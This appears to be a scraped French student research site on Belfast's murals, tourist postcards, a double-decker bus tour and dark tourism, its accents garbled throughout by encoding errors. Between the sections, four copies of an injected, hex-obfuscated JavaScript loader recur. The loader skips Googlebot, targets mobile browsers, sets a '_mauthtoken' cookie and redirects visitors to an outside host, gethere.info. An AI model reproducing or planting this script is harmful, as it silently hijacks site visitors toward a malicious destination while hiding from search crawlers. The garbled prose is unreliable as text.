A� This Postcards are only available in Belfast, at Green’s, Falls Road A� Cette inscription au dos des cartes postales nA�2 et nA�3, et notamment l’erreur de terminaison, laisse supposer une production A� A�chelle rA�duite.

Les trois cartes postales restantes comprennent des murals dit « neutres », ne s’inscrivant pas dans le conflit et la pA�riode des troubles. Il s’agit en effet, d’une carte portant sur la thA�matique de l’auteur des Chroniques de Narnia, C. S. Lewis [fig.4], ainsi qu’une deuxiA?me carte [fig.5] reprA�sentant les chantiers navals ayant construit le Titanic.

La derniA?re des cartes [fig.6] sort un peu du lot, car elle donne A� voir l’Ulster de maniA?re plus large. Divers paysages verdoyants y sont reprA�sentA� dans de petits mA�daillons. L’un d’eux, dans la deuxiA?me colonne, reprend un dA�tail de la fresque des chantiers du Titanic. Cet A�lA�ment est le seul qui renvoi A� A�de l’urbain, les autres images reprA�sentant surtout des ruines et de la nature, A� la��exception de la pancarte « Old Bushmills » ainsi que des bateaux.

Observations

Au vue de la difficultA� rencontrA�e A� trouver des cartes postales comprenant des motifs avec tirA� ou reprA�sentant des murals, nous constatons une rA�ticence A�vidente face A� ce type de documents.

Sur les six cartes achetA�es, quatre sont entiA?rement consacrA�e A� des fresques, la sixiA?me [fig.6] ne reprA�sentant qu’un extrait de mural parmi divers motifs.

La moitiA� des cartes rA�coltA�es a pour objet des fresques liA�es aux Troubles [fig.1, fig.2, fig.3], l’autre moitiA� reprA�sentant des murals dit « neutre » [fig.4, fig.5, fig.6]. Des trois cartes postales en lien avec le conflit, deux, [fig.2 et fig.3] soutiennent, par le choix des motifs reprA�sentA�s, l’un des acteurs. De plus, ces deux cartes ne sont pas produites par une agence officielle, A� l’inverse des quartes restantes, mais sont produite de maniA?re amateur.

N.F. – S.P. – L.Z.


1- Gauthier, L., Staszak, J.-F., ClichA�s exotiques, Paris, A�ditions de Monza, 2015, p.59
2- Ibidem
3- MFS Press, The Belfast Mural Guide, Belfast, 2014, p.13
4- Ibidem, p.16

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Double Decker Bus Tour

Le jour de notre arrivA�e A� Belfast, nous nE?avons perdu aucun temps pour commencer notreA�enquA?te. AprA?s avoir dA�posA� nos affaires A� lE?auberge Vagabonds, nous sommes partis faire un tour de la ville en cA�lA?bre bus rouge A� deux A�tages de Hop On Hop Off. MalgrA� le temps gris, venteux et trA?s froid, bon nombre da��entre nous sont montA�s en haut pour vivre lE?expA�rience culte du bus impA�riale.

Serrant fort nos A�charpes et se blottissant lE?un contre lE?autre sur les siA?ges, nous A�coutionsA�la guide commenter la premiA?re partie du tour: le quartier du Titanic. Elle nous a montrA� lesA�quais oA? prenait forme le navire lA�gendaire, ainsi que les studios de film qui contribuent A�A�la transformation actuelle de la ville. Nous avons appris aussi divers faits sur Belfast; leA�navire soeur du Titanic, le S.S. Nomadic qui a A�tA� transformA� en archive national pourA�retrouver ses potentiels ancA?tres Irlandais; le marchA� de Saint-Georges qui a lieu chaque week-end; ainsi que diverses statues et endroits dits importants pour la culture de Belfast.

Bien que ces renseignements furent intA�ressants, ce na��est quE?A� lE?arrivA�e dans le quartier de Falls que lE?intA�rA?t de notre groupe sE?est mobilisA�, lorsque la guide nous a indiquA� les premiers murals. Puisque mon groupe se concentre sur la reprA�sentation des murals auprA?s des agents touristiques, nous sommes restA�s attentifs aux murals indiquA�s tout au long du parcours A� travers Falls et Shankill.

Le quartier de Falls sa��est tout de suite distinguA� par la prA�sence du drapeau tricolore Irlandais accrochA� aux fenA?tres, devant diffA�rents magasins et tachetA� un peu partout dans les rues. On remarque aussi la prA�sence de la langue gaA�lique: souvent les petits magasins portent des noms irlandais tout comme certains murals qui soutiennent la cause RA�publicaine. Nous sommes entrA�s dans le quartier depuis le sud-ouest de Falls Road et montA�s vers le nord-est.

Le premier mural que la guide nous a indiquA� se trouvait sur notre gauche: le mural de Cumann na mBan ou lE?IrishwomenE?s Council. Elle nous a rapidement racontA� lE?importance de la comtesse Markievicz qui apparaA�t dans ce mural, et son rA?le dans lE?Easter Rising. AprA?s, elle a attirA� notre attention sur le mural Plastic Bullets qui commA�more ceux qui ont A�tA� tuA�s par des balles en plastique du cA?tA� RA�publicain. Lors de la mention de ce mural, le guide nous a racontA� comment les deux communautA�s sont encore sA�parA�es par la religion, notamment dans les A�coles. On continuait le trajet le long de Falls Road avec des brA?ves indications sur les murals de The Easter Rising at the GPO Ardoyne et de SeA?n Mac Diarmada. Nous sommes passA�s A�galement devant le mural de Bobby Sands oA? la guide nous a expliquA�s quE?il A�tait le premier hunger striker mort de faim. Pas loin de ce mural se trouvait un autre qui rend hommage aux autres hunger strikers de lE?IRA. Finalement, pour conclure notre tour du quartier de Falls, le bus a continuA� son parcours en longeant le International Peace Wall. Elle a attirA� notre attention sur lE?attractivitA� touristique du mur, nous disant que cE?A�tait le plus grand a�?guestbooka�? du monde.

A� ce moment lA�, nous A�tions plusieurs A� descendre au niveau infA�rieur du bus pour A�chapper au froid et reprendre la sensation dans les mains. Traversant le No ManE?s Land, entre les barriA?res qui sA�parent les quartiers, nous sommes arrivA�s A� Shankill, une des parties loyaliste de Belfast. Nous avons remarquA� toute de suite le changement de drapeaux: celui de la Grande-Bretagne affichA� partout. Le quartier, tout comme celui de Falls, ne perdait aucune occasion da��afficher son appartenance. Bien que la guide ait pris un ton globalement neutre le long du parcours, nous avons remarquA� un changement subtile ici. LorsquE?elle nous a indiquA� le mural de The First BelfastA�BattalionA�Volunteers,A�elle rA�pA�tait A� plusieurs reprises que le paramilitaire a commis des actes dE?horreur, nous donnant lE?impression que cE?A�tait le cA?tA� E�mA�chantE? en quelques sorts du conflit. Cependant, en montrant les murals du King of Orange et du Northern Ireland Football, elle a repris son ton enthousiaste et neutre. Enfin, le tour a terminA� par Sandy Row et lE?usine de briques.

En somme, nous trouvons que le tour A�tait une bonne initiation A� la ville de Belfast. Nous A�tions surtout intA�ressA�s par la visite des quartiers de Falls et Shankill, et la grande partie que jouaient les murals et le conflit dans le tour. Pour ma part, ja��ai ressenti une sorte de pitiA� pour les habitants, longtemps piA�gA�s dans un conflit A� mon avis pas nA�cessaire. La��affichage fier des drapeaux, les murals sa��exprimant la fidA�litA� pour telle ou telle cause ma��ont fait penser A� une sorte da��endoctrinement: les habitants y vivants ont tellement la��habitude de cette division que celle-ci les rend en quelques sortes aveugles. AprA?s ce tour, je me suis posA� une premiA?re question sur le terrain: est-ce que, non seulement les agences touristiques mettent-elles en avant certains murals, mais est-il aussi possible que ces agences mettent en avant leur positionnement sur le conflit A� travers leurs guides ?

ParA�Nicole Frazier, Simon Paratte et LA�a Zignani

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

MA�thodologies & DonnA�es rA�coltA�es

[en construction]

Vous trouverez ci-dessous les diffA�rentes catA�gories de documents et de donnA�es que nous avons rA�coltA� dans le cadre de nos recherches.

Les donnA�es, ainsi que les mA�thodes utilisA�es pour les acquA�rir sont prA�sentA�es sous chacun des liens suivant.
La rA�colte des diverses donnA�es y est dA�crite et un retour rA�flexif sur le choix des diffA�rentes mA�thodes ainsi que de leurs applications sur le terrain est donnA�. Enfin l’analyse des observations effectuA�es clos chacun des liens.

Circuits touristiques
Documentation touristique et souvenir
Interviews
ConfA�rences

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Images des Murals en circulation dans le tourisme

A� Quelles representations des murals de Belfast alimentent un cercle da��images? Quelles significations ce cercle prend-il dans le contexte post-conflictuel de la ville? A�

Par Nicole Frazier, Simon Paratte & LA�a Zignani

a�? INTRODUCTION

Chaque anneI?e, 9.5 millions de touristes visitent la ville de Belfast. Les murals font indA�niablement partis de la��offre touristique de la ville. A travers notre voyage da��A�tude et sa prA�paration, nous nous intA�ressons au sujet des images de murals en circulation auprA?s des touristes. Notre objectif est de constituer un A�chantillon de reprA�sentations des murals adressA�es aux touristes, se rA�pA�tant sur des documents leurs A�tant destinA�s, formant ainsi un cercle da��image.

Pour ce faire, nous nous penchons sur diverses sources, telles que des visites organisA�es dans le cadre du voyage da��A�tude. Nous rajoutons aI� cela une analyse de documents rA�coltA�s ainsi que des mirco-trottoirs effectuA�s sur place.
Nous tentons ici de constituer une collection de ces images rA�currentes, tout en A�tudiant les agents les mettant en circulation ca��est-A�-dire les acteurs du tourisme ainsi que les touristes eux-mA?mes ; mais aussi les motifs qua��elles reprA�sentent. Nous nous interrogeons notamment sur les explications et les raisons possibles derriA?re la redondance da��images des murals les plus reprA�sentA�s.


a�? INTRODUCTION

a�? PARTIE THA�MATIQUE
A�
a�? CONCLUSION
A�

 var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Dark tourism A� Belfast

Notre travail sa��inscrit dans la thA�matique du tourisme, et plus prA�cisA�ment, dans le dark tourism, cette forme de tourisme est indirectement et intimement liA�e aux catastrophes humaines et naturelles, et donc A� la mort et A� la��atrocitA�. Nous allons rapporter ce thA?me A� la ville de Belfast qui fut le terrain da��affrontements violents ayant conduis A� la construction de frontiA?res physiques. MA?me si aujourda��hui le conflit a A�tA� officiellement rA�solu et que de ce fait, le but des peace walls na��est plus le mA?me qua��autrefois, ces murs et les fresques qui les recouvrent ne peuvent se dA�tacher de la caractA�ristique sinistre qui leur est associA�e et qui a A�tA� au fondement mA?me de leur construction.

Dans cette optique, nous tenterons da��expliquer dans quelle mesure la��offre touristique A� Belfast repose sur une logique propre au dark tourism. Pour ce faire, nous nous focaliserons au prA�alable sur la��offre touristique et sur comment ces lieux sont prA�sentA�s et notamment A� travers la��analyse de divers documents tels que les flyers, sites internets et guides touristique. Sur place, nous nous concentrerons sur les discours des acteurs de la��offre touristique et sur la maniA?re dont les tours sont prA�sentA�s. Le questionnement quant A� la mobilisation et la��instrumentalisation de la mort et des atrocitA�s commises en ces lieux sera central dans notre recherche . Nous sommes en effet face A� une forme de tourisme atypique et inhabituelle. Il sa��agit da��explorer si les diffA�rents acteurs de la��offre exploitent cette originalitA�.

